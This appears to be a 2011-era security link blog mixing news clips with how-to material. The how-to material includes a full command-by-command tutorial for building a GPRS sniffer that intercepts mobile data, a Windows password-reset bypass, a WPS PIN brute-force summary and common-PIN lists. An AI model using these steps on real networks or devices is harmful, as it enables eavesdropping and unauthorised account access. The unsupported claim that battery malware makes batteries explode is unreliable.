Due to poor implementation a brute force attack can be mounted which only has to guess the first half of the pin. This means there are only 11000 combinations to guess in total and each guess takes around 1.3 seconds. There is no mechanism in routers to disconnect a user after so many failed login attempts.
The PDF shows how it works. There is an unreleased proof of concept tool (Stefan Viehbock is cleaning up the code) but using the paper you should be able to implement it yourself.

viehboeck_wps.pdf (application/pdf Object).

Karsten Nohl / Luca Melette explained how it works at the Chaos Computer Club Communication Camp 2011.

Camp 2011: GPRS Intercept.

A simpler tutorial can be found here

– Download sources into ~/gprs_sniffer

git clone git://git.osmocom.org/osmocom-bb.git
git clone git://git.osmocom.org/libosmocore.git
git clone git://git.srlabs.de/gprsdecode.git
wget http://srlabs.de/dl/gprs_multi.patch

– Download ARM cross compiler

wget http://gnuarm.com/bu-2.15_gcc-3.4.3-c-c++-java_nl-1.12.0_gi-6.1.tar.bz2
tar xf bu-2.15_gcc-3.4.3-c-c++-java_nl-1.12.0_gi-6.1.tar.bz2

– Compile and install libosmocore

cd ~/gprs_sniffer/libosmocore
autoreconf -i
./configure
make
sudo make install

– Compile gprsdecode

cd ~/gprs_sniffer/gprsdecode
make

– Prepare OsmocomBB’s burst_ind branch

cd ~/gprs_sniffer/osmocom-bb
git checkout origin/sylvain/burst_ind
git checkout d1cb8ea9b784c7acbafbb2fdcedbdf4655c2f6f5
patch -p1 < ~/gprs_sniffer/gprs_multi.patch - Compile OsmocomBB cd src export PATH=$PATH:~/gprs_sniffer/gnuarm-3.4.3/bin make - Run OsmocomBB firmware # Conect Motorola phone with USB cable cd ~/gprs_sniffer/osmocom-bb/src ./host/osmocon/osmocon -m c123xor -p /dev/ttyUSB0 ./target/firmware/board/compal_e88/layer1.compalram.bin # Switch on Motorola phone - Run OsmocomBB host software (in 2. terminal) cd ~/gprs_sniffer/osmocom-bb/src ./host/layer23/src/misc/cell_log - Adjust to active network # look for active networks in the output: cell_log.c:334 Sync ARFCN 29 (rxlev -52, 289 syncs left) cell_log.c:190 Cell: ARFCN=29 MCC=222 MNC=01 (Italy, TIM) # in this case, network is TIM, and ARFCN is 29 # kill cell_log with ctrl-c, and rerun with correct ARFCN: ./host/layer23/src/misc/layer23 -a 29 # Data channel assignments look like this layer3.c:243 GSM48 IMM ASS (ra=0x72, chan_nr=0x0a, HSN=44, MAIO=0, TS=2, SS=0, TSC=0) l1ctl.c:506 Tx Dedic.Mode Est Req (maio=0, hsn=44, chan_nr=0x0a) # Red lines indicate signal strength # In this case 3 out of 4 slots are used: l1ctl.c:261 BURST IND: @(2064231 = 1556/13/06) ( -50 dBm, SNR 255) l1ctl.c:261 BURST IND: @(2064231 = 1556/13/06) ( -50 dBm, SNR 1) l1ctl.c:261 BURST IND: @(2064231 = 1556/13/06) ( -50 dBm, SNR 255) l1ctl.c:261 BURST IND: @(2064231 = 1556/13/06) ( -50 dBm, SNR 255) # wait for session end or kill with ctrl-c # A file like "bursts_20110821_1648_29_2094723_0a.dat" is produced - Run GPRS decoder # Start Wireshark, capturing on interface "lo" ~/gprs_sniffer/gprsdecode/gprsdecode bursts_20110721_1648_29_2094723_0a.dat - Optional: Test with sample data wget http://srlabs.de/dl/gprs_262_80_0001_0000_20110710_2251_875_494777_0f.dat ~/gprs_sniffer/gprsdecode/gprsdecode gprs_262_80_0001_0000_20110710_2251_875_494777_0f.dat wget http://srlabs.de/dl/gprs_262_80_0001_0000_20110710_2252_875_514147_0f.dat ~/gprs_sniffer/gprsdecode/gprsdecode gprs_262_80_0001_0000_20110710_2252_875_514147_0f.dat - Optional: Build Wireshark from source svn co http://anonsvn.wireshark.org/wireshark/trunk wireshark cd wireshark ./autogen.sh ./configure make sudo make install - Optional: Uplink sniffing # the default firmware captures 4 downlink slots, # for uplink you need to compile a different firmware. # open "osmocom-bb/src/target/firmware/layer1/prim_sniff.c" # at line 288, modify #if 1 to 0 # go back to 'Compile and install libosmocore'

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

via sqlmap: automatic SQL injection and database takeover tool.

Sneaky Command-Line Fu: Reset the Password with the System Rescue CD

If you need access to the operating system itself, the Linux-based System Rescue CD is a good option for breaking in. You’ll need to do a bit of command line work, but as long as you follow the instructions closely you should be fine. Hat tip to our friends at the How-To Geek.

How It Works: Just download the .iso file for the System Rescue Live CD and burn it to disc. Boot from the disc and hit the default option when the blue screen comes up. After everything loads and you’re presented with a command-line interface, type fdisk -l to see the drives and partitions on your computer. Pick the Windows partition (usually the largest NTFS partition) and note the name, e.g. /dev/sda3.

Then, run the following command:

Make sure to replace /dev/sda3 with the partition you noted earlier. Next, cd to your Windows/System32/config directory with this command:

We want to edit the SAM file in this folder, so type the following command to get a list of users:

Note the username you want to access, and then type the following command, replacing Whitson Gordon with the username in question.

At the next screen, choose the first option by typing the number 1 and hitting Enter. This will clear the user password, making it blank. When it asks you to write hive files, hit y and press Enter. It should say OK, and then you can type reboot to reboot the computer. When you boot into Windows, you’ll be able to log in to that user’s account without a password.

How to Beat It: Once again, the weakness of this method is that it still can’t beat encryption. Changing the password will disallow you access to those encrypted files, which, if the user has encrypted their entire OS, makes this method pretty useless. If they’ve only encrypted a few files, though, you’ll still be able to access all the unencrypted stuff without a problem.

How to Break Into a Windows PC (And Prevent It from Happening to You).

Exclusive: Computer Virus Hits U.S. Drone Fleet | Danger Room | Wired.com.

“BEAST is different than most published attacks against HTTPS,” Duong wrote in an email. “While other attacks focus on the authenticity property of SSL, BEAST attacks the confidentiality of the protocol. As far as we know, BEAST implements the first attack that actually decrypts HTTPS requests.”

via Hackers break SSL encryption used by millions of sites • The Register.

with the plastic PIN pad, it was even possible to determine from the heat signatures not only the numbers pressed but also the number order.

via Stealing ATM PINs with thermal cameras | Naked Security.

Android app logs keystrokes using phone movements • The Register.

respawn_redux.

Bitcoin is not inherently anonymous. It may be possible to conduct transactions is such a way so as to obscure your identity, but, in many cases, users and their transactions can be identified. We have performed an analysis of anonymity in the Bitcoin system and published our results in a preprint on arXiv.

via An Analysis of Anonymity in the Bitcoin System: Bitcoin is not Anonymous.

Security researcher Charlie Miller has announced that he has found a way to hack the chips that control the batteries in Apple’s MacBook, MacBook Pro, and MacBook Air. Using these chips, he was able to brick (or ruin) batteries, or even install persistent malware that would survive a physical hard drive change.

via Charlie Miller Finds Way to Hack MacBook Battery | News | The Mac Observer.

Basically the heat controllers only have 2 default passwords, which means you can install malware in the bios which overheats and explodes the batteries.

DVD Player and Blu-ray Player region codes – VideoHelp.com.

KinectNUI is a Natural User Interface for Windows, built on the Kinect SDK. If you have a Kinect and a modern Windows PC, you should be able to get it to work.

via KinectNUI: Kinect SDK NUI Hack.

Groovedown – Grooveshark.com Downloader.

On June 16, 2011, LulzSec released over 62,000 accounts containing emails and passwords in cleartext obtained from random sources. LulzSec announced the release in a Twitter post at https://twitter.com/#!/LulzSec/status/81327464156119040. The table below is the list of these accounts. Passwords have been partially masked to protect the users from further attacks.

LulzSec cleartext passwords.

“The following new elements [should include] penalisation of the production and making available of tools eg, malicious software designed to create ‘botnets’ or unrightfully obtained computer passwords for committing the offences [of attacks against computer systems],” the Council of Ministers said in a statement pages 18-19 of 38-page/176KB PDF.

The real problem with this, is that it also makes penetration testing tools illegal. Which means we won’t be able to know if code others write in closed source is secure at all.

via European Council: Creating hacking tools should be criminal across EU • The Register.

1234, 0000, 2580, 1111, 5555, 5683 (spells LOVE), 0852, 2222, 1212, 1998

via These Are the Most Common Lockscreen PINs – Lifehacker.

gpedit.msc isn’t available for windows home versions. Because it’s basically just a frontend for the registry, you can download an excel spreadsheet with the gpedit settings next to the correct registry entry from Microsoft.

Download details: Group Policy Settings Reference for Windows and Windows Server.

This looks like an easy to install, comprehesive and easy to use frontend for your snort logs based on Ruby on Rails.

Snorby – All About Simplicity.

Internet probe can track you down to within 690 metres – tech – 05 April 2011 – New Scientist.

The pensioner was digging for scrap metal when she hacked into a fibre-optic cable which runs through Georgia to Armenia, forcing many thousands of Internet users in both countries offline for several hours on March 28.

via 75 year old killed Georgia, Armenia internet – Times LIVE.

Attackers breached the servers of RSA and stole information that could be used to compromise the security of two-factor authentication tokens used by 40 million employees to access sensitive corporate and government networks

via RSA breach leaks data for hacking SecurID tokens • The Register.

Again… hahahaha – 5 seconds is all it took 🙂

Safari/MacBook First To Fall At Pwn2Own 2011 – Slashdot.